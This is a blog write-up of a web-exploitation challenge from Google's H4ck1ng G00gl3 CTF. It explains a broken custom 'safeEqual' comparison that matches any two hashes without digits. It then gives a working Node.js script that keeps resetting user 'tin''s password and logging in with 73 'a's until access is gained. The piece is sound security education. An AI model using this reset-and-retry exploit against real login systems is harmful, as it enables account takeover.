<!DOCTYPE html><html lang="en" data-astro-cid-bvzihdzo> <head><!-- Global Metadata --><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><meta name="generator" content="Astro v4.15.4"><!-- Canonical URL --><link rel="canonical" href="https://danielorihuela.github.io/blog/h4ck1ng-g00gl3-ep004ch02/"><!-- Primary Meta Tags --><title>H4ck1ng G00gl3 ep004 challenge 02</title><meta name="title" content="H4ck1ng G00gl3 ep004 challenge 02"><meta name="description" content="todo"><!-- Open Graph / Facebook --><meta property="og:type" content="website"><meta property="og:url" content="https://danielorihuela.github.io/blog/h4ck1ng-g00gl3-ep004ch02/"><meta property="og:title" content="H4ck1ng G00gl3 ep004 challenge 02"><meta property="og:description" content="todo"><meta property="og:image" content="https://danielorihuela.github.io/blog-placeholder-1.jpg"><!-- Twitter --><meta property="twitter:card" content="summary_large_image"><meta property="twitter:url" content="https://danielorihuela.github.io/blog/h4ck1ng-g00gl3-ep004ch02/"><meta property="twitter:title" content="H4ck1ng G00gl3 ep004 challenge 02"><meta property="twitter:description" content="todo"><meta property="twitter:image" content="https://danielorihuela.github.io/blog-placeholder-1.jpg"><link rel="stylesheet" href="/_astro/_slug_.BVZF4iwd.css">
<style>code[class*=language-],pre[class*=language-]{color:#f5f5f5;text-shadow:0 0 2px #100c0f,0 0 5px rgba(220,7,142,.2),0 0 10px rgba(255,255,255,.2);background:none;font-size:1em;text-align:left;white-space:pre;word-spacing:normal;word-break:normal;word-wrap:normal;line-height:1.5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-hyphens:none;-moz-hyphens:none;-ms-hyphens:none;hyphens:none}pre[class*=language-]{padding:1em;overflow:auto}:not(pre)>code[class*=language-],pre[class*=language-]{background:#34294f}:not(pre)>code[class*=language-]{padding:.1em;border-radius:.3em;white-space:normal}.token.block-comment,.token.cdata,.token.comment,.token.doctype,.token.prolog{color:#969896}.token.punctuation{color:#ccc}.token.selector{color:#72f1b8;text-shadow:0 0 2px #100c0f,0 0 10px rgba(37,124,85,.4588235294),0 0 35px rgba(33,39,36,.4588235294)}.token.function-name{color:#6196cc}.token.constant,.token.symbol{color:#f92aad;text-shadow:0 0 2px #100c0f,0 0 5px rgba(220,7,142,.2),0 0 10px rgba(255,255,255,.2)}.token.attr-value,.token.char,.token.regex,.token.variable{color:#f87c32}.token.entity,.token.operator,.token.url{color:#67cdcc}.token.bold,.token.important{font-weight:700}.token.italic{font-style:italic}.token.entity{cursor:help}.token.inserted{color:green}.token.string{color:#90ee90}.token.class-name,.token.deleted,.token.directive.keyword+.token.string,.token.hexcode,.token.namespace,.token.tag,.token.unit{color:#fff;text-shadow:0 0 1px #ff4d4d,0 0 2px #ff4d4d,0 0 4px #ff4d4d,0 0 10px #ff4d4d,0 0 20px #ff4d4d}.token.macro{color:#fff;text-shadow:0 0 1px #f8d132,0 0 2px #f8d132,0 0 4px #f8d132,0 0 10px #f8d132,0 0 20px #f8d132}.token.attr-name,.token.boolean,.token.function,.token.selector .token.id{color:#fff;text-shadow:0 0 1px #00f2ff,0 0 2px #00f2ff,0 0 4px #00f2ff,0 0 10px #00f2ff,0 0 20px #00f2ff}.token.atrule,.token.builtin,.token.important,.token.keyword,.token.selector .token.class,.token.token.directive-hash{color:#fff;text-shadow:0 0 1px #bd32f8,0 0 2px #bd32f8,0 0 4px #bd32f8,0 0 10px #bd32f8,0 0 20px #bd32f8}main[data-astro-cid-bvzihdzo]{width:100%;background-color:#222}.hero-image[data-astro-cid-bvzihdzo]{width:40ch;max-width:100%;margin:auto}.hero-image[data-astro-cid-bvzihdzo] img[data-astro-cid-bvzihdzo]{display:block;margin:0 auto;border-radius:12px;box-shadow:var(--box-shadow)}.prose[data-astro-cid-bvzihdzo]{width:80ch;max-width:100%;margin:auto;color:#d3d3d3}.title[data-astro-cid-bvzihdzo]{margin-bottom:1rem;padding:1rem 0;text-align:center;line-height:1}.title[data-astro-cid-bvzihdzo] h1[data-astro-cid-bvzihdzo]{margin:0 0 .5rem}.date[data-astro-cid-bvzihdzo]{margin-bottom:.5rem;color:#fff}.last-updated-on[data-astro-cid-bvzihdzo]{font-style:italic}.title-name[data-astro-cid-bvzihdzo]{font-family:Iceland;color:#fff}.prose[data-astro-cid-bvzihdzo] img{display:flex;margin:0 auto 2em}.prose[data-astro-cid-bvzihdzo] p{margin-bottom:2em}
</style></head> <body data-astro-cid-bvzihdzo> <header data-astro-cid-3ef6ksr2> <nav data-astro-cid-3ef6ksr2> <div class="internal-links" data-astro-cid-3ef6ksr2> <a href="/" data-astro-cid-3ef6ksr2 data-astro-cid-eimmu3lg> Home </a>  <a href="/about" data-astro-cid-3ef6ksr2 data-astro-cid-eimmu3lg> About </a>  <a href="/blog" class="active" data-astro-cid-3ef6ksr2 data-astro-cid-eimmu3lg> Blog </a>  <a href="/open-source" data-astro-cid-3ef6ksr2 data-astro-cid-eimmu3lg> Open Source </a>  </div> </nav> </header>  <main data-astro-cid-bvzihdzo> <article data-astro-cid-bvzihdzo> <div class="hero-image" data-astro-cid-bvzihdzo> <img src="/_astro/hacking-google-2022.Cm7LR77H_Z4aiM2.webp" alt="" data-astro-cid-bvzihdzo width="1024" height="1024" loading="lazy" decoding="async"> </div> <div class="prose" data-astro-cid-bvzihdzo> <div class="title" data-astro-cid-bvzihdzo> <div class="date" data-astro-cid-bvzihdzo> <time datetime="2022-11-20T00:00:00.000Z"> Nov 20, 2022 </time>  </div> <h1 class="title-name" data-astro-cid-bvzihdzo>H4ck1ng G00gl3 ep004 challenge 02</h1> <hr data-astro-cid-bvzihdzo> </div>  <ul>
<li><a href="#introduction">Introduction</a></li>
<li><a href="#learning-journey">Learning Journey</a></li>
</ul>
<h1 id="introduction">Introduction</h1>
<p><a href="https://h4ck1ng.google/">H4ck1ng G00gl3</a> is a series of security
challenges published on <strong>October 2022</strong> where the only way to win is to
think like a hacker. In this post, I explain how I solved <strong>ep004
challenge 02</strong>. Category <strong>Web Exploitation</strong>.</p>
<h1 id="learning-journey">Learning Journey</h1>
<p><img  src="/_astro/intro.6zb3GHC7_Z10JHkE.webp" alt="" width="507" height="171" loading="lazy" decoding="async"></p>
<p>In this challenge, we are given some code. We have to find the
vulnerability and login as “tin”. Let’s check the code.</p>
<p><img  src="/_astro/hashed-passwords.DUBqzlfV_Zp2BsM.webp" alt="" width="947" height="239" loading="lazy" decoding="async"></p>
<p>I found two hardcoded users and their hashed passwords in the “users.js”
file. My first idea was to try and bruteforce somehow the password for
“tin”, but to no avail. I also searched for the value in some rainbow
tables on the internet, but it didn’t work out.</p>
<p>In that file, I also found a function to reset the password with a
comment saying: “we don’t allow admins to reset passwords”. “tin” is not
an admin, and that comment makes me think it has to be an important
detail. However, I don’t see how this helps me now, so I wrote it down
and continued reading the code.</p>
<p><img  src="/_astro/reset-password.Dkehfl8P_ZXtCwU.webp" alt="" width="864" height="423" loading="lazy" decoding="async"></p>
<p>I found another interesting file, “safe-equals.js”. It’s strange because
<strong>the developers programmed their own version of constant time string
comparison</strong>. Programming your own cryptographic functions is dangerous.
For sure, there must be some vulnerability hidden here. At first glance,
it seems to be correct. I didn’t pay the required attention to the code.
I read it fast and thought it was comparing each letter of the string
position by position, regardless of the first position where the letters
differed.</p>
<p><img  src="/_astro/safe-equal.BFMhKmag_2jwt7L.webp" alt="" width="1037" height="549" loading="lazy" decoding="async"></p>
<p>That made me lose a lot of time double-checking other parts of the code.
I went to ask the community. Effectively, the <strong>“safeEqual” function is
vulnerable</strong>. I had to come back and read it again. This time I decided
to check line by line and check on the internet the documentation for
every function. After that, I understood the problem. It isn’t comparing
each value stored in each position of the strings passed as input.
Instead, <strong>it compares the indices of the first appearance of every
number that the loop is iterating</strong>. I’m not sure I explained myself
there, so let me put it in an example.</p>
<pre class="language-javascript" data-language="javascript"><code is:raw="" class="language-javascript"><span class="token comment">// Example: call the function with two strings of the same length</span>
<span class="token keyword">function</span> <span class="token function">safeEqual</span><span class="token punctuation">(</span><span class="token string">'abc123'</span><span class="token punctuation">,</span> <span class="token string">'a1b2c3'</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">let</span> match <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>

    <span class="token comment">// For our input, this condition is not met</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span>a<span class="token punctuation">.</span>length <span class="token operator">!==</span> b<span class="token punctuation">.</span>length<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token comment">// This is not executed</span>
        match <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token keyword">const</span> l <span class="token operator">=</span> a<span class="token punctuation">.</span>length<span class="token punctuation">;</span> <span class="token comment">// l = 6</span>
    <span class="token comment">// Iterate from 0 to 5</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">let</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&#x3C;</span> l<span class="token punctuation">;</span> i<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      <span class="token comment">// Compare the index of value "i" in both strings.</span>
      <span class="token comment">// For i = 0 -> a.indexOf(0) === b.indexOf(0) -> -1 === -1 -> true</span>
      <span class="token comment">// For i = 1 -> a.indexOf(1) === b.indexOf(1) -> 4 === 1 -> false</span>
      <span class="token comment">// ...</span>
      match <span class="token operator">&#x26;&#x26;=</span> a<span class="token punctuation">.</span><span class="token function">indexOf</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span> <span class="token operator">===</span> b<span class="token punctuation">.</span><span class="token function">indexOf</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>


  <span class="token keyword">return</span> match<span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token function">safeEqual</span><span class="token punctuation">(</span><span class="token string">'abc123'</span><span class="token punctuation">,</span> <span class="token string">'a1b2c3'</span><span class="token punctuation">)</span> <span class="token comment">// returns false</span>
<span class="token function">safeEqual</span><span class="token punctuation">(</span><span class="token string">'abcd'</span><span class="token punctuation">,</span> <span class="token string">'qwer'</span><span class="token punctuation">)</span> <span class="token comment">// returns true</span>
<span class="token function">safeEqual</span><span class="token punctuation">(</span><span class="token string">'ab12c'</span><span class="token punctuation">,</span> <span class="token string">'qw121'</span><span class="token punctuation">)</span> <span class="token comment">// returns true</span>
</code></pre>
<p>The function checks that the first occurrence of each number in both
strings returns the same index. If you think about it, that means that
any two strings without numbers will return true. <strong>The trick then is to
reset “tin” password until it creates a hash without numbers. Then, we
must log in with a password that produces a hash without numbers.</strong></p>
<p>First, I searched for a password that produced a hash without numbers.
It was simple. I just computed in a for loop the hash value for strings
of different lengths with the letter “a” (e.g., “a”, “aa”, “aaa”). The
result was that a <strong>string containing seventy-three “a” produces a hash
without numbers</strong>. That is our password. The second step was creating a
script that automatically called the reset password endpoint and then
tried to log in with the password we computed.</p>
<pre class="language-javascript" data-language="javascript"><code is:raw="" class="language-javascript"><span class="token keyword">const</span> requestPromise <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">'request-promise'</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">defaults</span><span class="token punctuation">(</span><span class="token punctuation">{</span> <span class="token literal-property property">jar</span><span class="token operator">:</span> <span class="token boolean">true</span> <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">var</span> loginOptions <span class="token operator">=</span> <span class="token punctuation">{</span>
    <span class="token literal-property property">method</span><span class="token operator">:</span> <span class="token string">'POST'</span><span class="token punctuation">,</span>
    <span class="token literal-property property">uri</span><span class="token operator">:</span> <span class="token string">'https://vrp-website-web.h4ck.ctfcompetition.com/login'</span><span class="token punctuation">,</span>
    <span class="token literal-property property">form</span><span class="token operator">:</span> <span class="token punctuation">{</span>
        <span class="token literal-property property">username</span><span class="token operator">:</span> <span class="token string">'tin'</span><span class="token punctuation">,</span>
        <span class="token literal-property property">password</span><span class="token operator">:</span> <span class="token string">'a'</span><span class="token punctuation">.</span><span class="token function">repeat</span><span class="token punctuation">(</span><span class="token number">73</span><span class="token punctuation">)</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token literal-property property">followAllRedirects</span><span class="token operator">:</span> <span class="token boolean">true</span><span class="token punctuation">,</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>

<span class="token keyword">var</span> resetOptions <span class="token operator">=</span> <span class="token punctuation">{</span>
    <span class="token literal-property property">method</span><span class="token operator">:</span> <span class="token string">'POST'</span><span class="token punctuation">,</span>
    <span class="token literal-property property">uri</span><span class="token operator">:</span> <span class="token string">'https://vrp-website-web.h4ck.ctfcompetition.com/reset-password'</span><span class="token punctuation">,</span>
    <span class="token literal-property property">form</span><span class="token operator">:</span> <span class="token punctuation">{</span>
        <span class="token literal-property property">username</span><span class="token operator">:</span> <span class="token string">'tin'</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>

<span class="token punctuation">(</span><span class="token keyword">async</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">let</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
    <span class="token keyword">let</span> incorrect <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
    <span class="token keyword">while</span> <span class="token punctuation">(</span>incorrect<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">const</span> loginResponse <span class="token operator">=</span> <span class="token keyword">await</span> <span class="token function">requestPromise</span><span class="token punctuation">(</span>loginOptions<span class="token punctuation">)</span><span class="token punctuation">;</span>
        incorrect <span class="token operator">=</span> <span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">Incorrect</span><span class="token regex-delimiter">/</span></span><span class="token punctuation">.</span><span class="token function">test</span><span class="token punctuation">(</span>loginResponse<span class="token punctuation">)</span><span class="token punctuation">;</span>
        console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span><span class="token punctuation">;</span>
        i<span class="token operator">++</span><span class="token punctuation">;</span>

        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>incorrect<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span>loginResponse<span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">break</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        <span class="token keyword">await</span> <span class="token function">requestPromise</span><span class="token punctuation">(</span>resetOptions<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre>
<p>Executing the script returns the response with the flag. With that, we
completed the challenge.</p>
<p><img  src="/_astro/intro.6zb3GHC7_Z10JHkE.webp" alt="" width="507" height="171" loading="lazy" decoding="async"></p>  </div> </article> </main> <footer></footer> </body></html>